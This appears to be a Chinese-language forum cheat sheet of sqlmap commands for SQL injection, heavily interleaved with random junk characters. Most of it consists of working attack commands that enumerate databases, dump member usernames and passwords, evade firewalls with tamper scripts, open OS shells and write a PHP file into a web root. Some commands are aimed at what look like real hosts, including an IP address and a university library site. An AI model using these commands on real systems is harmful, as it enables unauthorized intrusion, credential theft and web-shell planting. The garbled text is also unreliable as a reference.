/pentest/database/sqlmap
# G6 d* ?2 Z9 t$ a' Z+ F, K) s5 Z1 T- i* J7 p" D |# u
update :::::> in the folder after execute following order : svn update
: ]5 y& f" s% Z C* i0 Q; Q4 G! W/ g+ S" [
sqlmap.py -r 1.txt --current-db) J7 q4 N1 J3 @7 D2 b0 J
' e7 @4 S) K4 t! M% c3 Y
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
1 G* _7 K& Z( j! s$ o9 m& u+ z( U
; w. S( A% F* j' p) o==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
8 f: N: e$ c/ f3 s# K1 Z* z9 q猜解数据库
1 n, `$ ~/ q& U0 ]./sqlmap.py -u "injection-url" --dbs& G! I0 R! e: b1 x& C! h; t7 y
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
6 M5 z$ o2 g m- M- @7 [7 P* X% P9 ^7 N5 l. u2 E6 M. Q6 K
猜解表名
. `$ q/ n1 | u" i ?./sqlmap.py -u "injection-url" -D database_name --tables
$ o4 ?" Y7 C2 ] q0 |3 P
# n! \3 l0 P: Y8 ~, zsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py") ~6 | _& i3 @! M0 b
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
' k ~# y+ q! M( ^7 |! k1 b" }1 I6 s/ g- J
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump1 F# K4 A7 W- C$ K7 Z6 u
7 m' ^5 E$ W* ksqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
- s. Y1 r; O$ N$ o0 L0 P' X' isqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"3 A+ K& {1 ^8 t! V Z+ z
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 9 b g$ W0 y. d0 A z/ d" j/ R1 _
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"0 R# p6 v0 K- V& r. y: @2 O5 i
0 i2 _+ X; e; v1 y5 Qsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"+ ^6 b% ~6 z' g% z8 z5 A' P
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"0 m% E: m! n, u- _$ n3 N. i* ~6 V
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py") X( T [ x- k! c* E! P
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 S! W; _! B& n8 Usqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
! T: m* [$ `1 T) @# T8 p6 ?% B* N v+ L/ a$ t/ A
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了* l3 J/ D# s9 R5 b2 F6 f
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py". v9 N$ W( `; W/ o0 u/ B
% J! V- H: a7 s; ssqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
) P3 q" s* ]7 y2 m9 r$ Q猜解列名: `, F0 ?. V9 J
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns: }5 p# `: M# w- N
9 \4 B/ Q- v" d O, V6 C6 Y3 Bsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 0 i: B5 A: B [ ~/ [; L4 }
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
% f) q- j/ ]: z8 ~ \4 Xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
9 G4 O! ~; h5 J2 f3 I/ ^
* I }5 g( }1 b" k9 ]sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
7 _" K0 e" G0 x$ N& Z' z5 |&submit=Go) ?! r# u+ y U* S
猜解值
) l6 O4 m" V# G G" c! I+ l! J./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump P4 l+ o+ q6 p7 w
========================================================
8 R( v$ r7 \3 ^: N. }搜索表名中包括mana字符的
; m; v5 x; |# P; W. r& T! f }/sqlmap.py -u "injection-url" -T mana --search% G$ G5 Z: c; x1 N6 n0 H1 E
返回一个交互式sql shell1 w0 ?7 {% W& f+ K
/sqlmap.py -u "injection-url" --sql-shell
# j* M9 ]- T7 h) i0 d读取指定文件(需权限)' w/ t3 R- F, V
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 a0 d0 W' w2 o. {查看当前 用户 及 数据库
\2 M3 ^; L# P* P/sqlmap.py -u "injection-url" --current-user --current-db9 [: D3 e8 D, Y( _( T* I0 R
本地文件 写入 远程目标绝对路径
& X j, j4 r* Y! d2 n/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
3 @+ a! i1 H1 Q: n9 Qsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" % Y6 ~% {4 ]2 X' M$ V& J& m1 h* h
) q" u, W% `; S+ U$ m; K
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
" c8 x& r" i' f5 l ^* k2 S, d* k8 q查看某用的权限1 Q5 B( G& J' g0 d
/sqlmap.py -u "injection-url" --privileges -U root
& n- ~5 t2 Y n" _6 l; V查看当前用户是否为dba
' _6 y, W. ?2 U9 ?/sqlmap.py -u "injection-url" --is-dba/ J6 p; a: g1 l. n1 m
读取所有数据库用户或指定数据库用户的密码5 k1 A( w: t, \- s( ~; Z o
sqlmap.py -r 1.txt --users --passwords
) i5 v. l; B- v- L. ?sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 4 n: \- ?$ G/ U4 G% ~; s
1 C5 j. F/ I. @0 w/sqlmap.py -u "injection-url" --passwords -U root/ I/ p/ j6 q5 B- R m
- Q4 y6 X+ B1 X% T0 J: `: \1 \7 o--start&&--stop 与 --first&&--last 的区别
0 `. g" c" X: h/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……): a `( _/ k, y. o0 h
8 c3 r& }. Z) o4 A从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
! Y* h5 E) b' v0 G9 ?8 q! H/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
. Q9 n B. X- Q* i: w; Z/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns5 z; x; V9 R8 r3 Q
, {8 k% H$ l! g
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
2 N1 [0 P, P. J# Y- X( h0 k/ k8 L/ B/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"/ G6 F6 w3 W4 u5 w
" m5 ~. n5 s' f+ I8 p |